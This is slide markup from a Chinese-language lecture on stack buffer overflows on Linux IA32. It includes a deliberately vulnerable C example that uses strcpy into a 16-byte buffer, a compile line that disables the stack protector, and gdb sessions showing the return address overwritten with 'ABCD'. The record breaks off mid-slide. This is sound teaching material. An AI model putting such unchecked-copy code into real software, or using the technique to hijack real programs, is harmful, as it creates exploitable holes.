              <a:rPr dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为函数的局部变量分配的空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为被调用函数的参数分配的空间</a:t>
            </a:r>
            <a:r>
              <a:rPr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006" y="346016"/>
            <a:ext cx="4444016" cy="378554"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" spc="5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350008" y="336652"/>
            <a:ext cx="9841992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36652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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="1738593"/>
            <a:ext cx="4430395" cy="707887"/>
            <a:chOff x="1598315" y="1418185"/>
            <a:chExt cx="4430396" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12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2066310" y="1418185"/>
              <a:ext cx="3962401" cy="506729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/>
              <a:r>
                <a:rPr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缓冲区溢出概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="2771117"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17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Linux IA32 的进程映像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13" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="3794116"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15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gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:srgbClr val="245689"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:srgbClr val="4C8ED0"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gra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缓冲区溢出的原理</a:t>
              </a:r>
              <a:endPara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1307460" y="4839340"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720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04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335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缓冲区溢出攻击技术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2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" y="336652"/>
            <a:ext cx="12191998" cy="378554"/>
            <a:chOff x="0" y="247949"/>
            <a:chExt cx="12191998" cy="378554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="矩形 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3571132" y="247949"/>
              <a:ext cx="862086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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781722" y="295336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en-US" altLang="zh-CN" sz="2400" spc="-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缓冲区溢出的原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" spc="-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object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923925" y="1539240"/>
            <a:ext cx="10458450" cy="376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由于函数里局部变量的内存分配是发生在栈帧里的，所以如果在某一个</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数内部</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>定义了缓冲区变量，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>则这个</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>缓冲区变量所占用的内存空间是在该函数被调用时所建立的栈帧里</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对缓冲区的潜在操作</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(比如字串的复制)都是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从内存低址到高址</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的，而内存中所保存的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数返回地址往往就在该缓冲区的上方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(高地址)—— 这是由于栈的特性决定的，这就</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为覆盖函数的返回地址提供了条件</a:t>
            </a:r>
            <a:r>
              <a:rPr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" y="336652"/>
            <a:ext cx="12191998" cy="378554"/>
            <a:chOff x="0" y="247949"/>
            <a:chExt cx="12191998" cy="378554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="矩形 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3875618" y="247949"/>
              <a:ext cx="8316380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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613187" y="29509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en-US" altLang="zh-CN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缓冲区溢出的原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0847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895350" y="1531365"/>
            <a:ext cx="10020299" cy="320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当用大于目标缓冲区大小的内容来填充缓冲区时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>就可以改写保存在函数栈帧中的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>，从而改变程序的执行流程，执行攻击者的代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>以下例程(buffer_overflow.c)给出Linux  IA32构架缓冲区溢出的实例。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006" y="346016"/>
            <a:ext cx="4444016" cy="378554"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" spc="5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350008" y="336652"/>
            <a:ext cx="9841992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36652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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="1738593"/>
            <a:ext cx="4430395" cy="707887"/>
            <a:chOff x="1598315" y="1418185"/>
            <a:chExt cx="4430396" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12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gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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2066310" y="1418185"/>
              <a:ext cx="3962401" cy="506729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/>
              <a:r>
                <a:rPr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缓冲区溢出概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="2771117"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17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gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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Linux IA32 的进程映像</a:t>
              </a:r>
              <a:endPara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13" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="3794116"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15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gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:srgbClr val="245689"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:srgbClr val="4C8ED0"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gra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缓冲区溢出的原理</a:t>
              </a:r>
              <a:endPara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1307460" y="4839340"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720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gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:srgbClr val="245689"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:srgbClr val="4C8ED0"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gra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缓冲区溢出攻击技术</a:t>
              </a:r>
              <a:endPara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575" y="782624"/>
            <a:ext cx="6048375" cy="541046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="129413" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPts val="3175"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="9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IA32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构架缓冲区溢出的实例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sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="001F5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buffer_overflow.c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2872" y="1538604"/>
            <a:ext cx="8117053" cy="50622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&lt;stdio.h&gt;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&lt;string.h&gt;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Lbuffer[]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"01234567890123456789========ABCD";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foo()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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="317500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef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buff[16];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17500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef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5" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>strcpy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(buff, Lbuffer);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main(int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argc,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char *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argv[])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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="317500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1315720" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0" smtClean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foo();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0;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915822" y="1153887"/>
            <a:ext cx="11028528" cy="44300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编译并运行该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程序：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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 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gcc -fno-stack-protector -o buf ../src/buffer_overflow.c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469900" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="205"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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 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./buf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200914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Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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 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gdb buf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6465" marR="551815">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530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GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1)  7.4-2012.04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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(gdb) 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Starting program: /home/ns/overflow/bin/buf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="926465" marR="5080">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125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Program received signal SIGSEGV, Segmentation fault.  0x44434241 in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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(gdb)</a:t>
            </a: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可见会发生段错误。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952501" y="1054100"/>
            <a:ext cx="9949180" cy="515333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为了找出错误原因，需要用gdb对程序./buf进行调试。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69900" lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="240665" algn="l"/>
                <a:tab pos="2413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ns@ubuntu:~/overflow/bin$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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buf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205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GNU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gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="1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7.4-2012.04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21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......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ct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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反汇编main和foo：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69900" lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="240665" algn="l"/>
                <a:tab pos="2413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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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disas</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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main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927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="22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Dump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assembler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code for function</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="31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0x08048400</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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&lt;+0&gt;:   push  %ebp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135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="20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0x08048401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&lt;+1&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-1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mov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0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0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%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-1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esp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,%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-1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ebp</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
            </a:pP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0x08048403</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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&lt;+3&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$0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x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-35" dirty="0" smtClean="0"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000" spc="-45" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>fffff</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0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,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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esp</a:t>
            </a:r>
            <a:endParaRPr sz="2000" spc="-5" dirty="0" smtClean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135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1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0x08048406</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-3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&lt;+6&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5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0x80483e4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-4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&lt;foo&gt;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135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="20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0x0804840b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&lt;+11&gt;: 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mov  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$0x0,%eax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135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="21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0x08048410</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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&lt;+16&gt;:  leave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135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="205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0x08048411</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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&lt;+17&gt;:  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1135380" lvl="2">
              <a:spcBef>
                <a:spcPts val="20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End of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assembler</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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dump.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1847851" y="1254125"/>
            <a:ext cx="9207499" cy="473270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(gdb)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disas</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"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foo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38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Dump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assembler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code for function</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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foo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="716280" lvl="1">
              <a:spcBef>
                <a:spcPts val="47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0x080483e4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&lt;+0&gt;:               push    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b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%ebp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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="37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0x080483e5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"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&lt;+1&gt;:                </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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mov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  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%esp,%ebp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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="38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0x080483e7</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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&lt;+3&gt;:              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sub     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$0x28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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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%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esp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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="37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0x080483ea</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000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&lt;+6&gt;:                </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15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m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ov</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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 smtClean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$0x80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4a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04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0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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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%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eax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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="37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0x080483ef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&lt;+11&gt;:               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mov      %eax,0x4(%esp)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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="38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0x080483f3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&lt;+15&gt;:               le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	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-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0x18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(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%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e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>b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,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%e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x  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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="37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0x080483f6</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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&lt;+18&gt;:               mov       %eax,(%esp)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98500" lvl="1">
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef>
            </a:pP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0x080483f9</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b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&lt;+21&gt;:              </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b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call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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b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0x8048300</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-9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&lt;strcpy@plt&gt;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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="37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0x080483fe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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&lt;+26&gt;:               </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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leave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16280" lvl="1">
              <a:spcBef>
                <a:spcPts val="37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0x080483ff</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"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&lt;+27&gt;:               </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-2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ret</a:t>
            </a:r>
            <a:endParaRPr sz="2000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716280" lvl="1">
              <a:spcBef>
                <a:spcPts val="37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End of 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assembler</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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dump.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227" y="1118743"/>
            <a:ext cx="10339960" cy="46272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84200" marR="5080" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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在关键位置设置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断点。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在函数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foo的入口、对strcpy的调用、出口及其它需要重点分析的位置设置断点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</a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="595"/>
              </a:spcBef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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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 *(foo+0)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2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660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Breakpoint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1 at 0x80483e4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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 *(foo+21)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2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670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Breakpoint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 at 0x80483f9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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 *(foo+27)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2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660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Breakpoint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3 at 0x80483ff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef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(gdb) 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display/i $pc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884072" y="1078723"/>
            <a:ext cx="10517353" cy="468859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84200" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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运行程序并在断点处观察寄存器的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值：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marL="698500" lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="365"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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marR="1794510" lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30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Starting program: /home/ns/overflow/bin/buf  Breakpoint 1, 0x080483e4 in foo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()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1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: x/i $pc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1384300" lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3670300" algn="l"/>
                <a:tab pos="447548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=&gt; 0x80483e4 &lt;foo&gt;:	push	%ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="698500" lvl="1">
              <a:lnSpc>
                <a:spcPct val="13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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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x/x $esp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1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2755900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
